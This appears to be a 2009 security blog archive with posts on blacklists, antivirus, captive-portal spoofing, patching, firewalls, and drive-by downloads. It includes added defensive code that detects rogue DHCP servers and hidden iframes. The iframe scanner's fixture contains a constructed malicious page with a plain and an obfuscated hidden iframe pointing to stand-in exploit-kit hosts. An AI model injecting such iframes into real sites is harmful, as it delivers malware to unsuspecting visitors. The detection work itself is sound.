Thursday, June 25, 2009

State of the industry – June 2009

As the month comes to an end, there were a few interesting happenings of late that I wanted to comment on. First is the state of the spam blacklist SORBS. Apparently the University of Queensland wants to stop hosting SORBS, so SORBS is looking for a new home to immediately host their full 42RU rack of servers and enough bandwidth to cover their 30 billion DNS queries each day. Apparently SORBS has a checkered past, with many feeling that a closure of SORBS would be a good thing since the service apparently incorporates political and other questionable motivation that compromises its technical value. My thought? Spammers should be clamoring to host/buy it (discreetly, of course). Think about it: make sure all of your competition is listed, and don't list yourself. Your spam gets a free ticket through the first line of spam defense. If spam is really that lucrative, then buying/hosting SORBS would make financial sense.

Next is the state of Microsoft's anti-virus efforts. Many AV industry experts claim that Microsoft's entry into the AV market would be laughable and minimal. Indeed, Microsoft's previous OneCare suite left a lot to be desired. But according to AV-Test, Microsoft's new Security Essentials (codename "Morro") actually holds its own (well, the beta version at least). There was also speculation that Microsoft's AV scanner would be cloud-based, but it's confirmed to be a traditional local client application. The Security Essentials site indicates that no more beta downloads are being offered at this time, so we'll probably need to just wait for a full release later this year. In the meantime, Microsoft's AV efforts are readily apparent on their Malware Protection Center page. Also interesting is the quote by the CEO of AVG, another anti-virus company, in the previously linked ComputerWorld article. He basically says that viruses are so yesterday, and incoming web nasties and malware such as browser exploits are the big threats now. True.

Lastly is the state of man-in-the-middle attacks on public networks. Have you ever noticed that things like wireless hotspots and hotel networks are a huge catch-22 for trust and network security? You connect to a network and get assigned IP, DNS, and routing information from a DHCP server that may or may not be the legitimate DHCP server. Then you could come to a captive portal page that may or may not be the legitimate captive portal. The captive portal page says you must enter various information (Room number? Credit card? T-mobile login? Daily access code?) before you can use the network, but the information it requests may or may not be the information that is actually necessary. And that's assuming you even connected to the legitimate wireless AP in the first place (see more than one AP broadcasting the same SSID? Yeah...). Even SSL doesn't help here, because different places use different hostnames for their captive portal service, so you have no idea whether https://secure.FooBarHotelNetworkServices.com/captiveportal/sheraton/ is the right place or not when asked for your credit card number to get Internet access. An attacker can register any legitimate-looking domain name, get an SSL cert for it, and run their attack, and you would never know. ("Hello? Front desk? Can you please tell me the exact hostname for your captive portal, and whether or not I will need to enter a credit card number to get Internet access?") In a world of laptop cellular aircards and mobile phone tethering, those are a much safer bet these days.
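One defensive check for the first step of that chain, the DHCP server you can't vouch for, is to watch the offers a client receives and flag a second server competing for the same transaction, or one that hands out an unexpected DNS server. This is an added example, not code from the original post; the DHCPOFFER packets and the 10.0.0.x addresses are constructed for illustration.

```python
"""Flag rogue DHCP servers on a public network: more than one server answering
the same DISCOVER (same transaction id), or an offer handing out a DNS server
outside the expected set.  Added example, not code from the original post; the
offers below are constructed, not captured."""
import struct
from collections import defaultdict
from ipaddress import IPv4Address

MAGIC = b"\x63\x82\x53\x63"            # cookie that starts the DHCP option field

def build_offer(xid, yiaddr, server_id, dns):
    """Construct a minimal DHCPOFFER payload (236-byte BOOTP header + options)."""
    hdr = struct.pack("!4BI2H4I", 2, 1, 6, 0, xid, 0, 0x8000,
                      0, int(IPv4Address(yiaddr)), 0, 0)
    hdr += bytes(16 + 64 + 128)                     # chaddr, sname, file (zeroed)
    opts = (b"\x35\x01\x02"                         # option 53: message type OFFER
            + b"\x36\x04" + IPv4Address(server_id).packed   # option 54: server id
            + b"\x06\x04" + IPv4Address(dns).packed         # option 6: DNS server
            + b"\xff")                                      # end option
    return hdr + MAGIC + opts

def parse_offer(payload):
    """Return xid, offered address and the options this detector cares about."""
    if len(payload) < 240 or payload[236:240] != MAGIC:
        raise ValueError("not a DHCP payload")
    opts, i = {}, 240
    while i < len(payload) and payload[i] != 0xFF:
        if payload[i] == 0:                          # pad option has no length byte
            i += 1
            continue
        code, length = payload[i], payload[i + 1]
        opts[code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return {
        "xid": struct.unpack("!I", payload[4:8])[0],
        "yiaddr": str(IPv4Address(payload[16:20])),
        "msg_type": opts.get(53, b"\x00")[0],
        "server_id": str(IPv4Address(opts[54])) if 54 in opts else None,
        "dns": str(IPv4Address(opts[6][:4])) if 6 in opts else None,
    }

def detect_rogue(payloads, expected_dns):
    """Map each suspicious server id to the list of reasons it was flagged."""
    offers = [parse_offer(p) for p in payloads]
    offers = [o for o in offers if o["msg_type"] == 2 and o["server_id"]]
    by_xid = defaultdict(set)
    for o in offers:
        by_xid[o["xid"]].add(o["server_id"])
    flags = defaultdict(list)
    for xid, servers in by_xid.items():
        if len(servers) > 1:                         # two servers raced for one client
            for s in servers:
                flags[s].append(f"competing offers for transaction {xid:#x}")
    for o in offers:
        if o["dns"] not in expected_dns:
            flags[o["server_id"]].append(f"unexpected DNS server {o['dns']}")
    return dict(flags)

# Constructed scenario: the venue's server and a rogue one both answer xid 0x1234.
SAMPLE_OFFERS = [
    build_offer(0x1234, "10.0.0.50", "10.0.0.1", "10.0.0.1"),
    build_offer(0x1234, "10.0.0.51", "10.0.0.99", "10.0.0.99"),
]
```

On a real network the payloads would come from a packet capture of UDP port 68 traffic; the competing-offer rule cannot tell which of the two servers is the impostor, so both are reported and the DNS rule is what singles one out.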

Until next time,
- Jeff

Friday, June 19, 2009

The most important things on the Internet...A through Z

You may have noticed that Google's front page implements a style of auto-completion as you type in your query, ranked by popularity (although maybe it's not popularity, but it's definitely not relevance; I'm just assuming it is popularity). I've always been amused at what pops up after I type in a word or two, but today I was more curious than usual and started looking at the top terms for shorter and shorter word fragments. Eventually, I sparked on the idea of the most popular terms for the letters A through Z. So, without delay, here they are!

Amazon
Best buy
Craigslist
Dictionary
Ebay
Facebook
Gmail
Hotmail
Irs
Jcpenney
Kohls
Lowes
Myspace
Netflix
Orbitz
Photobucket
Quotes
Realtor.com
Southwest airlines
Target
Usps
Verizon wireless
Walmart
Xm radio
Youtube
Zillow

Other than 'Quotes' and 'Dictionary', the remaining words are large well-known sites or brands. We sure do live in a commerce and media-driven world, don't we? Hopefully people aren't using Google to find out the web address of Youtube; it reminds me of the Little Rascals quote "Quick, what's the number for 911?"

I've also noticed that the results can vary at different times, so the list you get might be slightly (or majorly) different. And different languages/locales provide different results (I just checked with www.google.fr). Which I suppose adds to the fun. I'll also leave the list of numbers (0-9) for you to look up yourself. Oh, the suspense!

Until next time,
- Jeff

Monday, June 15, 2009

Patches, auto-updating, and convenience

June has been a busy month for web-centric security patches. Microsoft fixed 31 different vulnerabilities (many affecting IE and Office), Adobe patched critical vulnerabilities in Adobe Acrobat and QuickTime, Google plugged some WebKit holes in Chrome, Apple released over 50 security fixes for Safari, and Firefox had 11 security vulnerabilities fixed, half of which were rated critical. With a lineup like this, a majority of the world is going to need to install patches to keep safe.

Despite the patches being available, history has shown that people don't always install them. Installing patches is an inconvenience; it interrupts the use of the system and potentially requires reboots. In enterprise environments, all of this can be semi-automated with patch management and deployment systems, centralized patch repositories like WSUS, and policies that dictate the employee just sit tight while mandatory patches are applied. But for home users, computer use is often casual--which means convenience has a very strong influence. If they get on the computer to check email or surf MySpace, they are likely to not want to postpone those computing desires in order to deal with installing patches first. That's assuming they even know about the availability of patches in the first place.

Recently some folks from Google and their partners released an analysis of web browser auto-update approaches. The analysis compared how quickly patches gained widespread deployment under the different patching processes each browser offers. For example, Chrome does "silent updates"--it will download patches/new versions and automatically install them without telling you. Firefox will automatically download updates, but then you still have to manually agree to the installation via a prompt given to you by Firefox. Safari tells you that an update is available, but then you have to manually agree to download and then install the update. Opera will inform you of a new version, but then you have to manually download the update yourself and proceed through the install wizard. Internet Explorer relies on the Windows Automatic Update agent to download and install patches.

Overall, the Google analysis found that Chrome’s silent update approach resulted in the widest spread of update deployment (97% of systems patched/updated) within a fixed period (three weeks). Firefox wound up with 85% of systems patched/updated after three weeks, and Safari and Opera wound up with some pretty low numbers. The conclusion? Badgering the user to be involved in the update process causes them to interrupt, abort, or ignore the process, leaving the patches/updates unapplied. That is non-ideal when security is involved.

But the mere availability of auto-update mechanisms (Chrome, Windows) doesn't solve the problem per se. I've encountered situations on numerous occasions where the user has disabled the automatic updating process because the software they were using was, well, "borrowed." Microsoft has been struggling with this issue for years now: whether to allow pirated copies of Windows to be eligible for service pack updates and other patches. They have slipped various anti-piracy checks into their update process under the moniker Windows Genuine Advantage, which means only legitimate copies of Windows have access to the collection of updates. But even if the software vendor doesn't implement technical restrictions to prevent pirated versions from updating, the user's conscience might still prevent it. A person who "borrows" a commercial software application from their friend is less likely to run to the vendor asking for support and updates, because they do not want to get their friend in trouble for handing out pirated copies; so such people are more likely to disable anything that automatically alerts the vendor to the second copy, and/or will ignore any updates (where they might be asked how they got the software in the first place) and just stick with the original (now outdated and insecure) version.

Overall this whole timely security patching business is a tough problem to solve, because it's not simply just a matter of expecting users to download an installation file off a website and double-clicking it.

Until next time,
- Jeff

Friday, June 12, 2009

Perimeter Security Lately

Back in the day, firewalls were all the rage. The bad stuff was outside, the good stuff was inside, and the firewall was the line between them. I haven't heard anyone seriously advocating the 'crunchy shell, chewy center' model for many years, and there is more than one long-standing list of anti-firewall arguments, plus recurring questions about where, exactly, the perimeter is anyway. Yet most corporations still use them, in one form or another. Why?

For one thing, a filter (a module or device that only some things go through, but others don't) is a very basic security technology. Just as there are a limited number of elements in the periodic table, there are a very limited number of basic security technologies, so even when people are building "new" security technology, the most basic pieces to pick from are limited, and you'll see a lot of repeats. Since firewall is a pretty well-known word that covers several members of this family, any filtering technology that works on traffic of some sort (whether it be a packet filter or a web application firewall) will tend to be called a firewall, even though firewalls now frequently work much higher up the stack than they did in the 80s.

So the real question is, what good is a filter installed on a perimeter? Most people will say it's for defense in depth, i.e. "We know it's not perfect, but we're hoping each layer will catch some different things and minimize the bad stuff that gets all the way through." It's the stock answer, and I wouldn't argue against the concept, but I think it misses a key point:

In a network, filters (including firewalls) break what can be enormously complex into smaller, more manageable pieces. It's like providing an API and using it to write modular code. The goal is to minimize the cases in which tweaking something over here wiggles something unexpected way over there. Sounds good for maintainability, but what does reducing action-at-a-distance have to do with security? Here we go back to design flaws. If the designer wasn't expecting anything else to be using or modifying some resource, but something else can, there could well be an exploitable design flaw. A well-configured filter in a good location can reduce the possibility of interaction, and therefore the chance the design flaw will be exploitable. Plus, partitioning any system means you can partition security analysis: each portion, the partitions, and any possible interactions between them. Without the partitions, it's all interactions, which are the least-well-understood security analysis subject I can think of.


These days, you have more perimeters than you think, and the things you are dividing aren't necessarily more adversarial to each other than they are internally. But at least if you divide them, you have smaller chunks to worry about.

-- Brenda

Monday, June 8, 2009

What we need in a Cyber Czar

Recently, President Obama announced the establishment of a Cyber Czar, although the candidate for the position has not yet been named. The new position will be a senior White House staffer, regularly reporting to the President. This position is an important one and I’d like to see the President make the right choice. Mr. Obama, I know that you’re a busy guy but here’s some friendly advice while mulling over the candidates.

Forbes asked the question – “should the head of cybersecurity in the new administration come from private industry, government or the military?”. The article debates the merits of each approach and discusses a few potential candidates. The answer, in my opinion, couldn’t be clearer. The candidate must come from private industry but must know how to dance in government circles. I was encouraged this past weekend when the administration named Jeff Moss, founder of the Black Hat security conferences, to the Homeland Security Advisory Council. It demonstrates a willingness to reach beyond political circles for candidates with real world experience. Jeff is an excellent choice, having seen the world through the eyes of both a hacker and a businessman, not to mention being one of the best connected people in the security industry.

Selecting a candidate for Cyber Czar from private industry is critical because the answer doesn’t lie in small tweaks to the status quo but in wholesale change. The current state of security in government networks is abysmal and the government just doesn’t do change well. When the attackers are succeeding in stealing top secret plans for fighter jets, the air traffic control system is wide open to attack and the power grid is littered with backdoors, incremental changes won’t suffice. Moreover, the government can’t secure their infrastructure alone. They don’t make the technology that they run, nor do they independently have the expertise necessary to secure the massive infrastructure that Americans rely on each and every day. The soon to be named Cyber Czar needs to come from private industry but be politically savvy. Having served in the government at some point in his/her career would be a great asset as let’s face it, politics is a game and if you don’t know the rules, you won’t succeed.

This isn’t the first time that the White House has called upon an outsider to help secure the nation’s IT infrastructure. In September 2003, Amit Yoran, founder of RipTech, was handed the title of Director of the National Cyber Security Division of the Department of Homeland Security. Despite the impressive title, the position was not in the White House, and came with limited power. Many speculate that Yoran left after only a year on the job after growing frustrated that he was unable to implement the changes that he sought. Unfortunately, despite the announcement from the President that the Cyber Czar will have a White House position, we still don’t know exactly what powers the office will wield. If we expect change, the Cyber Czar will need the ear of the President and the power to make change happen. If not, the position will wind up being a revolving door for bright minds with great ideas who soon grow frustrated with the red tape pinning them down.

Mr. President, this is an important opportunity. Please be sure to bring on board an outsider who is a visionary with the patience to play the political game. But most importantly, be sure to listen to him.

Sunday, June 7, 2009

Page is loading… Please wait

Web access is a critical activity for virtually all jobs, but how many employees recognize the risks that can be encountered simply by viewing a web page? How many times have you encountered web pages with a title such as “Page is loading… Please wait”? I’ve already talked about the threats posed by Phishing and ActiveX vulnerabilities in previous blogs. Another significant threat on the web is the increasingly popular drive-by download attack. In this attack, malicious software is downloaded without the user's knowledge by exploiting known or unknown web browser or operating system vulnerabilities. Recently, we came across an interesting website hosting a malicious animated page. The page shows an animation that entices the victim to wait patiently while content is supposedly being loaded. Below is a screen capture of the page in question.

When someone visits this web page, it will continually play the ‘page is loading…’ animation and nothing will ever be displayed on the page. The victim will undoubtedly grow impatient and eventually close the page and continue surfing. But wait; did the victim notice what else was being loaded? Of course not, as the malicious content was loaded in the background. Yes, the page actually contains a couple of malicious iframes:

Looking at the above code, there are two hidden malicious iframes: one is shown in plain text and the other is obfuscated. Those hidden iframes point to malicious websites hosting the “LuckySploit” attack toolkit. This is another exploit toolkit that takes advantage of different critical vulnerabilities to download additional malware, and it is more advanced than the older Mpack, Icepack, etc. toolkits. Finjan’s blog has provided detail on this new attack toolkit. After the victim visits the above page, the malicious website sends obfuscated JavaScript which exploits vulnerabilities, if present, and downloads additional malicious binaries. The packet capture for the obfuscated JavaScript is shown below,

The attacker has done his job behind the page by downloading malicious binaries without the user noticing. These attack toolkits spread by injecting malicious hidden iframes into otherwise legitimate sites. Once the victim visits those sites, they are redirected to the attacker’s website. Social engineering can also be employed to convince victims to directly visit malicious sites controlled by the attackers. The frightening part of these attacks is that the victim does not have to do anything. They simply visit the malicious page and everything runs in the background. Such malicious sites are increasing every day with advanced techniques and novel ways to spread malware. Browser patch management is critical for those enterprises seeking to defend against such attacks.
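A scanner for the two-iframe pattern described above, one frame in plain HTML and one hidden inside an obfuscated document.write(unescape(...)) call, is shown here as an added example; it is not code from the original post, and the sample page, its hostnames and the encoded payload are all constructed for illustration.

```python
"""Scan a web page for hidden iframes, including ones that only appear after
decoding a document.write(unescape("...")) payload.  Added example, not code from
the original post; the sample page and hostnames are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

UNESCAPE_RE = re.compile(r"""unescape\(\s*["']([^"']*)["']\s*\)""")

def _dimension(attrs, key):
    """Leading integer of a width/height attribute ('0', '1px', '300'), else None."""
    m = re.match(r"\d+", attrs.get(key, ""))
    return int(m.group()) if m else None

def is_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden frames are the tell-tale of drive-by loaders."""
    w, h = _dimension(attrs, "width"), _dimension(attrs, "height")
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((w is not None and h is not None and w <= 1 and h <= 1)
            or "display:none" in style or "visibility:hidden" in style)

def find_hidden_iframes(html, via="html", depth=0):
    """Return [{'src', 'via'}] for hidden iframes in the markup and, recursively,
    in anything an unescape() call would decode into the page."""
    collector = IframeCollector()
    collector.feed(html)
    found = [{"src": a.get("src", ""), "via": via}
             for a in collector.iframes if is_hidden(a)]
    if depth < 3:                                   # unescape() nested in unescape()
        for encoded in UNESCAPE_RE.findall(html):
            found += find_hidden_iframes(unquote(encoded), "unescape", depth + 1)
    return found

# Constructed page: a 'loading' animation plus one plain and one obfuscated hidden iframe.
OBFUSCATED = quote('<iframe src="http://kit.example/in.cgi" width=0 height=0></iframe>', safe="")
SAMPLE_HTML = f"""<html><body>
<img src="loading.gif" alt="Page is loading... Please wait">
<iframe src="http://redir.example/go.php" style="visibility: hidden" width="1" height="1"></iframe>
<script>document.write(unescape("{OBFUSCATED}"));</script>
</body></html>"""
```

Real loaders also use %uXXXX sequences, String.fromCharCode arrays or custom decoders, each of which needs its own decoding step before the same iframe check applies.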

We have observed a number of websites that are infected by hidden malicious iframes, and the latest ones include attacks carried out by LuckySploit and Gumblar. We recommend that you keep your antivirus updated and keep an eye out for such suspicious websites while surfing.

Happy surfing!!!

Umesh